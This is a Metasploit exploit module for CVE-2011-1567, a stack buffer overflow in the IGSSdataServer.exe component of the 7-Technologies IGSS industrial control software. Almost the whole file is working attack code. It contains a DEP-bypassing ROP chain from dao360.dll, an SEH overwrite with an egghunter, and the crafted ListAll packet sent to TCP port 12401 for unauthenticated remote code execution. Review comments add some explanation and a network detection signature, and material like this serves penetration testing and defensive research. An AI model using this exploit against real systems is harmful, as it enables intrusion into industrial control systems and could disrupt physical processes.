
7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2011-1567 (see 'References'): a stack buffer overflow in
# igssdataserver.exe reached through the ListAll command. There is a single target,
# Windows XP SP3 / 2003 Server R2 SP2, with DEP bypassed by a ROP chain built from
# non-rebased gadgets in dao360.dll (see the target 'Ret' comment and the chain below).
# Affected builds per 'Description': IGSS up to 9.00.00 b11063; the ICSA-11-132-01A
# reference presumably carries the vendor remediation guidance -- verify there.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Egghunter supplies generate_egghunter; Tcp supplies connect/sock/disconnect.
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Tcp

  # Module metadata. Only RPORT (default 12401) is registered as an option;
  # everything else comes from the Targets/Payload/DefaultOptions tables.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
        IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
        fails to do proper bounds checking before copying data into a small buffer on the stack.
        This causes a buffer overflow and allows to overwrite a structured exception handling record
        on the stack, allowing for unauthenticated remote code execution.  Also, after the payload
        exits, IGSSdataServer.exe should automatically recover.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', #Initial discovery, poc
          'Lincoln',        #Metasploit
          'corelanc0d3r <peter.ve[at]corelan.be>',   #Rop exploit, combined XP SP3 & 2003 Server
          'sinn3r',         #Serious Msf style policing
        ],
      'References'     =>
        [
          ['CVE', '2011-1567'],
          ['OSVDB', '72353'],
          ['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A']
        ],
      'Payload'        =>
        {
          # Null is the only bad char for the *encoded payload*; the wire header
          # itself carries nulls, so this constraint is about the payload, not the protocol.
          'BadChars' => "\x00",
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
            {
              # 'Ret' is the address written over the SEH record (see exploit, after the
              # Offset padding); 'Offset' is the byte position of that record in the body.
              'Ret'    => 0x1b77ca8c,  #dao360.dll pivot 1388 bytes
              'Offset' => 500
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-03-24',
      'DefaultTarget'  => 0))

      register_options(
      [
        Opt::RPORT(12401)
      ])
  end

  # Random 32-bit filler for ROP-chain stack slots that are consumed by
  # `RETN 08` / `RETN 0C` / `RETN 10` gadgets and never executed.
  # rand_text(4) yields four random bytes; unpack("L") reads them as one
  # native-endian unsigned 32-bit integer, and .to_i is a no-op on an Integer.
  # The value is re-packed with 'V' in the chain, so the read endianness is irrelevant.
  # NOTE(review): rand_text's default charset may include "\x00"; whether the server
  # tolerates nulls inside the body is not shown here (the header already contains
  # nulls, so it is presumably fine) -- confirm before relying on it.
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  # Builds and sends one oversized ListAll request, then hands off to the payload handler.
  # Wire layout: a fixed 36-byte header (opcode 0x0D, flag 0x01, command 0x01 = ListAll,
  # 14 random trailing bytes) followed by the body: ROP chain, NOP sled, egg hunter,
  # random padding up to target['Offset'] (500), target.ret, the egg (tagged encoded
  # payload) and 2000 random trailing bytes -- well over 2.5 KB in total.
  # Defensive note: a ListAll request (opcode 0x0D, command 0x01) to TCP/12401 whose body
  # is kilobytes long is far outside the fixed-size header this code reproduces, which
  # makes oversized ListAll requests a practical network detection signature.
  def exploit

    # Options handed to the Egghunter mixin: no checksum, tag 'w00t', and a
    # VirtualProtect-based DEP bypass that expects the address in esi.
    eggoptions =
    {
      :checksum => false,
      :eggtag => 'w00t',
      :depmethod => 'virtualprotect',
      :depreg => 'esi'
    }

    # hunter is the small search stub placed before the SEH overwrite; egg is the
    # tagged, encoded payload placed after it.
    badchars = "\x00"
    hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

    #dao360.dll - pvefindaddr rop 'n roll
    # Order and count of entries are significant (each `junk` fills a slot eaten by a
    # RETN N adjustment); do not reorder or dedupe. Absolute addresses, so this only
    # works where dao360.dll loads at its preferred base.
    rop_chain = [
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b7681c4,  # rop nop
      0x1b72f174,  # POP EAX # RETN 08
      0xA1A10101,
      0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08
      junk,
      junk,
      0x1b73a55c,  # XCHG EAX,EBX # RETN
      junk,
      junk,
      0x1b724004,  # pop ebp
      0x1b72f15f,  # &push esp # retn 8
      0x1b72f040,  # POP ECX # RETN
      0x1B78F010,  # writeable
      0x1b7681c2,  # xor eax,eax # retn
      0x1b72495c,  # add al,40 # mov [esi+4],eax # pop esi # retn 4
      0x41414141,
      0x1b76a883,  # XCHG EAX,ESI # RETN 00
      junk,
      0x1b7785c1,  # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
      junk,
      junk,
      0x1b78535c,  # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
      junk,
      junk,
      junk,
      junk,
      0x1b7280b4,  # POP EDI # XOR EAX,EAX # POP ESI # RETN
      junk,
      junk,
      junk,
      junk,
      0x1b7681c4,  # rop nop (edi)
      0x90909090,  # esi -> eax -> nop
      0x1b72f174,  # POP EAX # RETN 08
      0xA1F50214,  # offset to &VirtualProtect
      0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08
      junk,
      junk,
      0x1b73f3bd,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
      junk,
      junk,
      0x1b76a883,  # XCHG EAX,ESI # RETN 00
      0x1b72f040,  # pop ecx
      0x1B78F010,  # writeable (ecx)
      0x1b764716,  # PUSHAD # RETN
    ].pack('V*')

    # Fixed protocol header. The Size field stays "\x00\x04" regardless of the actual
    # body length, so the server evidently does not reconcile it with what follows --
    # presumably part of the missing bounds check described above; confirm.
    header  = "\x00\x04"  #Size
    header << "\x01\x00\x34\x12"
    header << "\x0D"      #Opcode
    header << "\x00\x00\x00\x00\x00\x00\x00"
    header << "\x01"      #Flag
    header << "\x00\x00\x00"
    header << "\x01"      #Command (ListAll)
    header << "\x00\x00\x00"
    header << rand_text(14)
    # `sploit` aliases the same String as rop_chain, so the `<<` calls below mutate
    # rop_chain too; harmless here because rop_chain is not used again.
    sploit = rop_chain
    sploit << "\x90" * 10
    sploit << hunter
    # Pad to 'Offset' (500) so target.ret lands on the SEH record named in 'Description'.
    sploit << rand_text(target['Offset'] - (sploit.length))
    sploit << [target.ret].pack('V')
    sploit << egg
    sploit << rand_text(2000)

    # Single request on the Tcp mixin socket, then wait for the payload's session.
    connect
    print_status("Sending request...")
    sock.put(header + sploit)
    handler
    disconnect

  end
end
